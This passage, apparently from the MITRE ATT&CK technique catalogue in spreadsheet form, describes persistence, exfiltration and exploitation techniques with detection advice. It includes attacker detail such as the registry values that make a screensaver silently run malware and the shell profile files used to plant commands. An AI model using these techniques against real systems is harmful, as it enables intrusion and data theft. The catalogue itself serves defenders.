* &lt;code&gt;$PsHome\Microsoft.{HostProgram}_profile.ps1&lt;/code&gt;
* &lt;code&gt;$Home\My Documents\PowerShell\Profile.ps1&lt;/code&gt;
* &lt;code&gt;$Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1&lt;/code&gt;
Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.</t>
  </si>
  <si>
    <t>Allen DeRyke, ICE</t>
  </si>
  <si>
    <t>T1546.002</t>
  </si>
  <si>
    <t>Event Triggered Execution: Screensaver</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in &lt;code&gt;C:\Windows\System32\&lt;/code&gt;, and &lt;code&gt;C:\Windows\sysWOW64\&lt;/code&gt;  on 64-bit Windows systems, along with screensavers included with base Windows installations.
The following screensaver settings are stored in the Registry (&lt;code&gt;HKCU\Control Panel\Desktop\&lt;/code&gt;) and could be manipulated to achieve persistence:
* &lt;code&gt;SCRNSAVE.exe&lt;/code&gt; - set to malicious PE path
* &lt;code&gt;ScreenSaveActive&lt;/code&gt; - set to '1' to enable the screensaver
* &lt;code&gt;ScreenSaverIsSecure&lt;/code&gt; - set to '0' to not require a password to unlock
* &lt;code&gt;ScreenSaveTimeout&lt;/code&gt; - sets user inactivity timeout before screensaver is executed
Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/002</t>
  </si>
  <si>
    <t>Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.
Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.</t>
  </si>
  <si>
    <t>T1546.005</t>
  </si>
  <si>
    <t>Event Triggered Execution: Trap</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The &lt;code&gt;trap&lt;/code&gt; command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like &lt;code&gt;ctrl+c&lt;/code&gt; and &lt;code&gt;ctrl+d&lt;/code&gt;.
Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format &lt;code&gt;trap 'command list' signals&lt;/code&gt; where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/005</t>
  </si>
  <si>
    <t>Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.</t>
  </si>
  <si>
    <t>T1546.004</t>
  </si>
  <si>
    <t>Event Triggered Execution: Unix Shell Configuration Modification</t>
  </si>
  <si>
    <t>Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (&lt;code&gt;/etc&lt;/code&gt;) and the user’s home directory (&lt;code&gt;~/&lt;/code&gt;) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. 
Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the &lt;code&gt;/etc/profile&lt;/code&gt; and &lt;code&gt;/etc/profile.d&lt;/code&gt; files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into &lt;code&gt;~/.bash_profile&lt;/code&gt;, &lt;code&gt;~/.bash_login&lt;/code&gt;, or &lt;code&gt;~/.profile&lt;/code&gt; which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used &lt;code&gt;~/.bash_profile&lt;/code&gt; to ensure execution. Adversaries have also leveraged the &lt;code&gt;~/.bashrc&lt;/code&gt; file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the &lt;code&gt;~/.bash_logout&lt;/code&gt; file to execute malicious commands at the end of a session. 
For macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using &lt;code&gt;/etc/profile&lt;/code&gt;, &lt;code&gt;/etc/zshenv&lt;/code&gt;, &lt;code&gt;/etc/zprofile&lt;/code&gt;, and &lt;code&gt;/etc/zlogin&lt;/code&gt;.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh) The login shell then configures the user environment with &lt;code&gt;~/.zprofile&lt;/code&gt; and &lt;code&gt;~/.zlogin&lt;/code&gt;. The interactive shell uses the &lt;code&gt;~/.zshrc&lt;/code&gt; to configure the user environment. Upon exiting, &lt;code&gt;/etc/zlogout&lt;/code&gt; and &lt;code&gt;~/.zlogout&lt;/code&gt; are executed. For legacy programs, macOS executes &lt;code&gt;/etc/bashrc&lt;/code&gt; on startup.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/004</t>
  </si>
  <si>
    <t xml:space="preserve">While users may customize their shell profile files, there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.
Monitor for changes to &lt;code&gt;/etc/profile&lt;/code&gt; and &lt;code&gt;/etc/profile.d&lt;/code&gt;, these files should only be modified by system administrators. MacOS users can leverage Endpoint Security Framework file events monitoring these specific files.(Citation: ESF_filemonitor) 
For most Linux and macOS systems, a list of file paths for valid shell options available on a system are located in the &lt;code&gt;/etc/shells&lt;/code&gt; file.
</t>
  </si>
  <si>
    <t>Robert Wilson; Tony Lambert, Red Canary</t>
  </si>
  <si>
    <t>T1546.003</t>
  </si>
  <si>
    <t>Event Triggered Execution: Windows Management Instrumentation Event Subscription</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015)
Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)
WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/003</t>
  </si>
  <si>
    <t>Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence) Monitor for the creation of new WMI &lt;code&gt;EventFilter&lt;/code&gt;, &lt;code&gt;EventConsumer&lt;/code&gt;, and &lt;code&gt;FilterToConsumerBinding&lt;/code&gt; events. Event ID 5861 is logged on Windows 10 systems when new &lt;code&gt;EventFilterToConsumerBinding&lt;/code&gt; events are created.(Citation: Elastic - Hunting for Persistence Part 1)
Monitor processes and command-line arguments that can be used to register WMI persistence, such as the &lt;code&gt; Register-WmiEvent&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, WMI: WMI Creation</t>
  </si>
  <si>
    <t>Brent Murphy, Elastic; David French, Elastic</t>
  </si>
  <si>
    <t>T1480</t>
  </si>
  <si>
    <t>Execution Guardrails</t>
  </si>
  <si>
    <t>Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails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guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1480</t>
  </si>
  <si>
    <t>Detecting the use of guardrails may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.</t>
  </si>
  <si>
    <t>Nick Carr, FireEye</t>
  </si>
  <si>
    <t>Anti-virus, Host forensic analysis, Signature-based detection, Static file analysis</t>
  </si>
  <si>
    <t>T1480.001</t>
  </si>
  <si>
    <t>Execution Guardrails: Environmental Keying</t>
  </si>
  <si>
    <t>Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)
Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).
Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1480/001</t>
  </si>
  <si>
    <t>Detecting the use of environmental keying may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.</t>
  </si>
  <si>
    <t>T1048</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.  
Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. 
[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1048</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Alfredo Abarca</t>
  </si>
  <si>
    <t>T1048.002</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 
Asymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin. 
Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1048/002</t>
  </si>
  <si>
    <t xml:space="preserve">Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) </t>
  </si>
  <si>
    <t>T1048.001</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol: Exfiltration Over Symmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 
Symmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data. 
Network protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP). </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1048/001</t>
  </si>
  <si>
    <t xml:space="preserve">Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) 
Artifacts and evidence of symmetric key exchange may be recoverable by analyzing network traffic or looking for hard-coded values within malware. If recovered, these keys can be used to decrypt network data from command and control channels. </t>
  </si>
  <si>
    <t>T1048.003</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 
Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1048/003</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>Exfiltration Over C2 Channel</t>
  </si>
  <si>
    <t>Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1041</t>
  </si>
  <si>
    <t>12 March 2020</t>
  </si>
  <si>
    <t>T1011</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium</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</si>
  <si>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
Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1011</t>
  </si>
  <si>
    <t>Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.
Monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.</t>
  </si>
  <si>
    <t>T1011.001</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium: Exfiltration Over Bluetooth</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an attacker may opt to exfiltrate data using a Bluetooth communication channel.
Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1011/001</t>
  </si>
  <si>
    <t>T1052</t>
  </si>
  <si>
    <t>Exfiltration Over Physical Medium</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1052</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute when removable media are mounted.</t>
  </si>
  <si>
    <t>Command: Command Execution, Drive: Drive Creation, File: File Access, Process: Process Creation</t>
  </si>
  <si>
    <t>T1052.001</t>
  </si>
  <si>
    <t>Exfiltration Over Physical Medium: Exfiltration over USB</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1052/001</t>
  </si>
  <si>
    <t>T1567</t>
  </si>
  <si>
    <t>Exfiltration Over Web Service</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</si>
  <si>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
Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1567</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1567.002</t>
  </si>
  <si>
    <t>Exfiltration Over Web Service: Exfiltration to Cloud Storage</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.
Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1567/002</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to known cloud storage services. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.</t>
  </si>
  <si>
    <t>T1567.001</t>
  </si>
  <si>
    <t>Exfiltration Over Web Service: Exfiltration to Code Repository</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.
Exfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1567/001</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to code repositories. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.</t>
  </si>
  <si>
    <t>T1190</t>
  </si>
  <si>
    <t>Exploit Public-Facing Application</t>
  </si>
  <si>
    <t>Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), network device administration and management protocols (like SNMP and Smart Install(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). 
If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1190</t>
  </si>
  <si>
    <t>Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.</t>
  </si>
  <si>
    <t>Containers, IaaS, Linux, Network, Windows, macOS</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>Praetorian; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1203</t>
  </si>
  <si>
    <t>Exploitation for Client Execution</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</si>
  <si>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
Several types exist:
### Browser-based Exploitation
Web browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.
### Office Applications
Common office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.
### Common Third-party Applications
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1203</t>
  </si>
  <si>
    <t>Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office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</si>
  <si>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T1212</t>
  </si>
  <si>
    <t>Exploitation for Credential Access</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</si>
  <si>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permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets) Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1212</t>
  </si>
  <si>
    <t>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Credential resources obtained through exploitation may be detectable in use if they are not normally used or seen.</t>
  </si>
  <si>
    <t>John Lambert, Microsoft Threat Intelligence Center</t>
  </si>
  <si>
    <t>T1211</t>
  </si>
  <si>
    <t>Exploitation for Defense Evasion</t>
  </si>
  <si>
    <t>Adversaries may exploit a system or application vulnerability to bypass security features. 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
Adversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1211</t>
  </si>
  <si>
    <t>Exploitation for defense evasion may happen shortly after the system has been compromised to prevent detection during later actions for for additional tools that may be brought in and used. Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery.</t>
  </si>
  <si>
    <t>Anti-virus, System access controls</t>
  </si>
  <si>
    <t>T1068</t>
  </si>
  <si>
    <t>Exploitation for Privilege Escalation</t>
  </si>
  <si>
    <t>Adversaries may exploit software vulnerabilities in an attempt to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
When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.
Adversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1068</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</si>
  <si>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or evidence of Discovery. Consider monitoring for the presence or loading (ex: Sysmon Event ID 6) of known vulnerable drivers that adversaries may drop and exploit to execute code in kernel mode.(Citation: Microsoft Driver Block Rules)
Higher privileges are often necessary to perform additional actions such as some methods of [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Look for additional activity that may indicate an adversary has gained higher privileges.</t>
  </si>
  <si>
    <t>Containers, Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Driver: Driver Load</t>
  </si>
  <si>
    <t>Idan Revivo, @idanr86, Team Nautilus Aqua Security; Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics; Yaniv Agman, @AgmanYaniv, Team Nautilus Aqua Security</t>
  </si>
  <si>
    <t>T1210</t>
  </si>
  <si>
    <t>Exploitation of Remote Services</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</si>
  <si>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
An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities,  or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.
There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169)
Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1210</t>
  </si>
  <si>
    <t>Lateral Movement</t>
  </si>
  <si>
    <t>Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.</t>
  </si>
  <si>
    <t>T1133</t>
  </si>
  <si>
    <t>External Remote Services</t>
  </si>
  <si>
    <t>Adversaries may leverage external-facing remote services to initially access and/or persist within a network. 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Management](https://attack.mitre.org/techniques/T1021/006) can also be used externally.
Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.
Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1133</t>
  </si>
  <si>
    <t>Initial Access, Persistence</t>
  </si>
  <si>
    <t>Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours.
When authentication is not required to access an exposed remote service, monitor for follow-on activities such as anomalous external use of the exposed API or application.</t>
  </si>
  <si>
